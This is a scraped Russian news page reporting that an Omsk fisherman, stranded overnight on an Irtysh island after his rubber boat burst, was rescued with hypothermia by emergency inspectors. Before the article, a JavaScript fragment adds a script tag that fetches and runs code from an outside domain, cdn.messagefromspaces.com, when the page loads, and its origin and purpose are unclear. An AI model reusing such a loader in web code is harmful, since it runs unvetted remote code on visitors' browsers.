, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 23 июля, 2018 года
19 ноября, 2013 События

Омич едва не утонул в Иртыше

Мужчина отправился порыбачить на резиновой лодке, которая лопнула. Омич был вынужден провести всю ночь на острове посреди Иртыша.

Сообщение о пропаже 55-летнего жителя поступило сегодня утром. По информации родственников, накануне мужчина вышел на надувной резиновой лодке на рыбалку в районе Ленинградского моста и не вернулся.

– На поиски оперативно выдвинулись инспекторы государственной инспекции по маломерным судам на моторной лодке «Фрегат-370». В короткий срок горе-рыбак в состоянии переохлаждения был обнаружен на острове без средств связи, на спущенной лодке. Мужчина пояснил, что лодка лопнула в результате замерзания, а телефон он забыл дома, – отметили в пресс-службе МЧС.

С пострадавшим была проведена профилактическая беседа о недопустимости совершенных им действий.

Перейти к комментариям [ 0 ]

Свежие статьи из категории: События